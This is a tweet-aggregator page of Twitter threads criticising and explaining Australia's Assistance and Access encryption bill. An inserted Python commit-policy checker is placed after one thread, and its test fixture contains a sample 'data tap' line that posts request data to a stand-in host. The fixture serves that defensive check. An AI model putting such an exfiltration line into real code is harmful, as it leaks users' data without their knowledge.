Discover and read the best of Twitter Threads about #AAbill

Most recent (24)

1/ Ok, well it's time to lay out my biggest concerns on #aabill. IANAL, but I'm a technologist, entrepreneur, and investor. Please get your own legal advice - keeping in mind much of this will be an expensive fight in the courts...
2/ Scope of the crimes. The #aabill covers crimes of 3+ years state, federal, **and foreign**. Yes, you can get 5 to 10 years jail for refusing to comply with #aabill... for a 3-year crime. Indeed, you can be targeted by #aabill for breaking #aabill.
3/ Scope of the "Designated Communications Provider." People seem to think this only covers messaging. It's much broader than that, covering most software, hardware, and networking. It includes software updates. Yes, an individual can be a DCP.
Read 9 tweets
Australia rushed through an anti-#crypto bill last week. @HRW just released a game that shows what might happen if authorities use the law to gut key security features in the phones & apps we use every day:… #EverydayEncryption #AAbill
Do you shop online or message with friends on WhatsApp or iMessage? Ever shared an intimate photo with your partner? Organized a protest? #Encryption protects that data from malicious hackers & govt snoops #EverydayEncryption
Choose your own adventure: See if you can safely guide a character Fei as she makes choices about her data, and find out how #EverydayEncryption might protect you:…
Read 11 tweets
(Reasonably) educated thread about the options global companies like Apple have going forward now that the #aaBill will happen in Australia.

I’ll start with my assumptions then explain their options #Auspol

1. Company will not compromise its core business strategy. Eg: for Apple this is sell devices/storage that are guaranteed to be secure. To the point that they won’t let the FBI in.
2. If you sell a product in Australia that is *same* as your global product then any engineered vulnerabilities* will impact global product.

*Australia doesn’t want to use term “back door” so let’s call it malware.
Read 6 tweets
No, not really. Not at all. I’ve seen quite a few tweets linking to this story. The Assistance & Access Bill certainly has problems, yes, but the way it’s characterised here is way off mark. In two key ways, I think... #aabill
First, it’s not “do whatever else it takes to decrypt subjects’ messages”. There’s a slab of stuff about having to be “reasonable, proportionate, practicable, and technically feasible”, and considering the likely business impact on the provider and wider public interests. #aabill
Obviously how that would pan out in practice remains to be seen, so expect some lively legal action for that! #aabill
Read 22 tweets
They passed that fucking #AABill anti-encryption law.

We're all fucked.


Here's a great example: some bright fuckwit at Police HQ thinks
"🤔 Hmm I need to see that person's bank transactions because they might, maybe, possibly be a terrorist! (actually I dunno ¯\_(ツ)_/¯)...
Hey, Bank; you must insert a back door so I can access their accounts. And you can't tell anyone."

Now there's a huge gaping fucking hole in the fence around our online banking for anyone (not just Fuckwit Policeman #1) to gain access to our bank accounts.
Here's another one: some bright spark is inevitably going to ask Apple to make a back door into their iPhones.
Read 12 tweets
Over in Australia they’re shooting themselves in the face with a shockingly technically nonsensical encryption backdoor law. Doesn’t even help it just poison-pills their entire domestic tech industry, breaks imports.

Send prayers to the kangaroo punchers with copper internet. 🙏
Update: sounds like #aabill was shelved until 2019? Is that true?
Wow there’s a senator up talking about how 90% of Internet communications are encrypted and that’s a problem.


They’re talking about HTTPS.
Oh lawd.

Read 7 tweets
Now Senator Jordan Steele-John is speaking on the #aabill in the Senate…
The lies and the stupidity that have strewn forth from the opposition were laughable and sickening. It showed for all to see the depths to which they will stoop to avoid any possible imputation that they might do anything other than be in lockstep with the government.
This is a piece of legislation dreamed up by a sinister public servant (Michael Pezzullo) driven by a bankrupt government and a laughable opposition. BUT I WARN YOU NOW. THERE IS A WHOLE INTERNET OUT THERE AND YOU ARE BEING WATCHED. THE INTERNET REMEMBERS.
Read 5 tweets
If you’re just tuning in to #auspol, let me catch you up on the high-stakes poker game the Govt and Opp have going here:

Coalition has a choice: prevent Labor & x-bench amended bill that would get #kidsoffnauru from reaching the Reps for a vote (which it would likely lose) – but in doing so also prevent final passage of #aabill (#encryption).
At the moment, parliamentary procedures are being used in Senate by Coalition, Bernardi & Hanson to delay getting to point where #kidsoffnauru amendments are voted on. Some filibustering going on, though Senate President is trying to curtail it.
Read 5 tweets
So, the #aabill passes, what does that mean?

I'm going to hypothesise and talk slightly outside my area of expertise, but bear with me
Does this mean encryption is going to be broken in Australia?
Nah, probably not. If you want to intercept end-to-end encrypted messages (iMessage, WhatsApp, Signal etc), the easier place to do this is at the endpoints, not in the middle
Back-dooring all the various messenger apps would be a massive, global change, and would involve authorities playing whack-a-mole as their targets move to new apps and protocols
Read 10 tweets
Ok. A third thread updating where things are at on the #aabill...
Since my last thread, the government came back to the negotiating table in the PJCIS and agreed to a series of amendments to the bill designed to prevent the issuance of Technical Capability Notices that could undermine strong encryption.
These amendments have been intensely negotiated with the government in a process that has been far from ideal, which is why Labor also secured agreement to continue scrutiny of the Bill through the PJCIS into 2019 and via the Independent National Security Legislation Monitor.
Read 25 tweets
Now amendments 1-173 to the #AAbill are being moved TOGETHER AS A BLOCK. THAT IS ONE HUNDRED AND SEVENTY THREE AMENDMENTS WILL BE MOVED AS A BLOCK. This is shoddy lawmaking in the extreme.…
The explanatory memorandum on these amendments has just been tabled. About 11 minutes before the complex and exhausting amendments are debated and voted on. Get in the bin @AustralianLabor Get In The Bin.
Labor got the amendments at 6.30 am, and they were put online after 9 am. Tony Burke is explaining why he is an invertebrate and should get in the bin.
Read 5 tweets
And now @WilkieMP is up to speak on the #aabill…
It is a bad idea to build a known vulnerability into encryption software says @WilkieMP To design a vulnerability, a weakness, access, is an invitation to wrongdoers to find the key and eavesdrop or see what people thought was a secure communication #aabill
What will our security partners and our business partners think of that? I think it is a reasonable conclusion to draw that there will be concern in other countries and business with operations in Australia with vulnerabilities in our ICT.
Read 8 tweets
Ed Husic now explains how the UK took its time to discuss this kind of legislation, unlike Oz with #AAbill. Provides helpful analogy - If you cut a tiny hole in the mozzie net and expect to not get bitten - you are foolish. And then Labor cuts the hole. Idiots.
Ed Husic explains that he opposed metadata legislation and is incredulous at the scope creep and scale (350,000 requests) of metadata - even by local councils! He describes judicial oversight under this bill as tissue tough. Right you are Ed.
Most of the government are so technically incompetent that if they can use the TV remote control it's a great tech achievement for them, says Ed Husic. This sensible guy certainly has a tech clue but will vote this shit law through because he's been misled by invertebrate @markdreyfusQCMP
Read 3 tweets
HOORAY - now @AdamBandt will speak some sense - the #AAbill undermines our tech industry and civil liberties. Once you create a door into otherwise secure and encrypted communications, you cannot know who else will access it.…
He explains that in other countries, the threat of secure communications no longer being secure has outweighed the perceived 'benefits'. In requiring weakness by law, you lose control over who can exploit that weakness.
There is no such thing as requiring companies to unlock encryption that doesn't create systemic weakness. What the #AABill does is not only request tech companies to assist, but to actively change their software and product.
Read 7 tweets
Invertebrate @markdreyfusQCMP currently speaking on the #AABill in the House of Reps…
Invertebrate @markdreyfusQCMP explains how shoddy the process on this bill has been, its lack of definitions, and how important encryption is. This doublespeak comes immediately prior to weakening encryption and Australia's tech sector. The hypocrisy is astounding and vile.
Invertebrate @markdreyfusQCMP confesses that there is still discussion underway about what "systemic weakness" is. Labor is about to pass this bucket and amendments are still being hammered out. It's a debacle and Not How Gravely Important Laws Should Be Made You Idiots. #AAbill
Read 4 tweets
Debate on #aabill getting underway in the House of Reps. You can watch here.…
Shadow AG Mark Dreyfus says security of the community must be "paramount" in parliament and Labor has shown it puts national security ahead of partisan politics.
He says national security agencies must be given powers they need to keep Australians safe, but must be proportionate, and with appropriate oversight.
Read 13 tweets
Thread: Today, everyday Aussies must stand up NOW and hold the line and call and/or email Labor MPs & Senators - incl Cross bench, and say "I oppose the #aabill" to protect and #Defendencryption Audience Q: Why should I?
A: Read the articles / tweets written by the experts and scholars who work and study in this field. For ease I have retweeted and liked their tweets in my timeline (it is not an exhaustive list). These are the people fighting for our human rights in digital rights & privacy.
These are the warriors trying to keep Aussies safe by making submissions to Govt as experts, explaining the danger in the #AAbill by breaking encryption. Everyday Aussies might argue, "I have nothing to hide" or "I don't use encryption"
Read 12 tweets
I've been talking to/listening to a lot of very smart tech people tonight, about #AAbill. Without exception, they are all furious, horrified, scared, or all three. Genuine fears this could hobble Aus tech industry, and surveillance used for far more than just serious crime
As a starting point, read @dobes clear explainer on what's going on and what the bill could mean…
Second, the claimed need to rush this through before Christmas is a moot point - it will take more than a month for anything to even change, and that's taking for granted that tech companies will agree to do so
Read 6 tweets
The amendments recommended from the committee in regards to the #aaBill are not sufficient and should not be passed, when the government and @AustralianLabor have failed to tell the public why there is the immediate need for this bill. I am strongly worried.
That the passage of this bill will have grave consequences for the industry and all industries that rely on technology, given that evidence provided showed that...
1) Applications expected to be targeted such as WhatsApp are not under Australian jurisdiction and 2) Encryption used such as End-To-End encryption CANNOT BE BROKEN WITHOUT WEAKENING THE ENCRYPTION ITSELF OR BUILDING BACKDOORS that would threaten every Australian
Read 11 tweets
I’ve been asked for some talking points for non-technical people (like MPs, fr’instance) to demonstrate why the #aabill is no good.

Here’s a thread with my top 5. Please plagiarise and re-mix to your heart’s content.

1 of 5
1: The bill is bad for security because encryption keeps us safe from criminals. This bill will make it easier for them to hack us.

2: * The bill is bad for jobs because software companies will choose not to work in Australia, as this bill is fundamentally incompatible with GDPR.

Read 6 tweets
One of the ways #AABill gets access to systems is by commandeering employees of companies to write backdoors. But they’re not even allowed to tell their employer, or face jail time.

I went through the mechanics of this, and realised how out of touch Canberra is...
Let’s say they coerce a backend dev to write a data tap. A few lines of code here and there, write to a file or connect straight to http://@ASDGovAu/api/vacuum/

Now what? Most devs don’t have access to production! Hilarity ensues...
The dev is now going to somehow commit this to the repo in order to get it through the pipelines.

First thing is CI/CD will reject the commit because there’s no JIRA ticket for the change.

Ok, let’s slip it under another ticket. Nope! Test harness no longer passes!
Read 18 tweets
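The thread above describes two pipeline gates a coerced developer would trip: a commit with no ticket reference, and a change that introduces a new outbound data tap. Below is an added example (not code from the thread's author) of such a commit-policy check as it might run in a CI job. The ticket-key format, the allowlisted hosts, the dataclass name and the sample diffs are all assumptions constructed for this illustration.

```python
"""Commit-policy gate of the kind the thread describes.

A CI/CD step rejects a change unless the commit message references a
ticket, and separately flags any newly added outbound destination that
is not on the service's egress allowlist, so "slipping it under another
ticket" clears the first gate but not the second.
Added example; ticket format, hosts and diffs are assumptions.
"""
import re
from dataclasses import dataclass, field

# Assumed ticket-key format, e.g. PAY-1234.
TICKET_RE = re.compile(r"\b[A-Z][A-Z0-9]+-\d+\b")
# Captures the authority part of a URL (stops at the first '/').
URL_RE = re.compile(r"https?://([A-Za-z0-9.@_-]+)")
# Hosts this service is permitted to talk to (assumption for the example).
ALLOWED_HOSTS = {"api.internal.example", "metrics.internal.example"}


@dataclass
class PolicyResult:
    ok: bool
    reasons: list[str] = field(default_factory=list)


def check_commit(message: str, diff: str) -> PolicyResult:
    """Return ok=True only if the commit cites a ticket and adds no
    outbound destination outside ALLOWED_HOSTS."""
    reasons: list[str] = []
    if not TICKET_RE.search(message):
        reasons.append("no ticket reference in commit message")
    for line in diff.splitlines():
        # Only lines the commit adds matter; '+++' is the file header.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        for host in URL_RE.findall(line):
            if host not in ALLOWED_HOSTS:
                reasons.append(f"new outbound destination not allowlisted: {host}")
    return PolicyResult(ok=not reasons, reasons=reasons)


# Constructed sample diff: the "data tap" from the thread, pointed at a
# hypothetical collector host.
DATA_TAP_DIFF = """\
--- a/service/handlers.py
+++ b/service/handlers.py
@@ -10,6 +10,9 @@ def handle_transfer(req):
     record = db.insert(req.body)
+    # a few lines of code here and there
+    import urllib.request
+    urllib.request.urlopen("https://vacuum.example.net/api/ingest", data=req.body)
     return ok(record)
"""

# Constructed sample diff: a legitimate change talking to an allowlisted host.
CLEAN_DIFF = """\
--- a/service/handlers.py
+++ b/service/handlers.py
@@ -10,6 +10,7 @@ def handle_transfer(req):
     record = db.insert(req.body)
+    metrics.post("https://metrics.internal.example/v1/transfer", record.id)
     return ok(record)
"""


if __name__ == "__main__":
    for msg, diff in [("tidy up imports", DATA_TAP_DIFF),
                      ("PAY-1234 add transfer audit log", DATA_TAP_DIFF),
                      ("PAY-1234 add transfer metric", CLEAN_DIFF)]:
        result = check_commit(msg, diff)
        print(f"{msg!r}: {'accepted' if result.ok else 'rejected'} {result.reasons}")
```

The egress check is deliberately crude (it only sees literal URLs in added lines); in a real pipeline it would be one signal alongside code review and a network-policy enforced at runtime, which is the point the thread makes about a single developer being unable to quietly land a tap.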
The #aabill is incredibly short-sighted & luddite. Even if the AU Gov. can coerce tech companies to backdoor encrypted messaging platforms, nothing's going to stop people from resorting to using free & opensource #crypto software like @GnuPG! #auspol 1/
Popular #crypto software is trusted because it's been written & vetted by members of a decentralized #opensource community which you can't coerce. If you want to make it illegal to possess @GnuPG in Australia because you can't backdoor it, then you'll kill the IT industry. 2/
Software devs/engineers use #crypto daily to safeguard the apps & systems we code & run against malicious tampering. The #InfoSec community also needs to be confident it can discuss and coordinate responses to security vulnerabilities before they can be patched in private. 3/
Read 11 tweets
@mcannonbrookes Here’s my device maker’s and app writer’s guide to implementing #AABill in #ozcyber. The answer is a little nuanced & depends on what you’re trying to get at. I’ll also mention how you can protect yourself against it down below.
@mcannonbrookes The dirty way is to implement backdoors, in essence a backdoor-API. That API would need to be exposed, and would technically violate all encryption standards I know of and make the app/device un-certifiable for use in regulated industry.
@mcannonbrookes The cleanest way is for them to take a copy or a derived key for the encryption used. Like physical keys, they’d need to keep them somewhere safe; they can be copied; and they're easy to find.
Read 11 tweets
As a pen tester, here is what concerns me most about the #aabill: my job is to seek out vulnerabilities in clients' software, and then report them to the client.
As far as I understand it, the #aabill seems to be saying that if I find and write about one that the government put there, it's... my fault?
Then, of course, if you were a company who had been ordered to include a not-a-backdoor into your software, you probably wouldn't want pen testing done because this vuln isn't legally allowed to be found, and during a pen test it _would_ be...
Read 20 tweets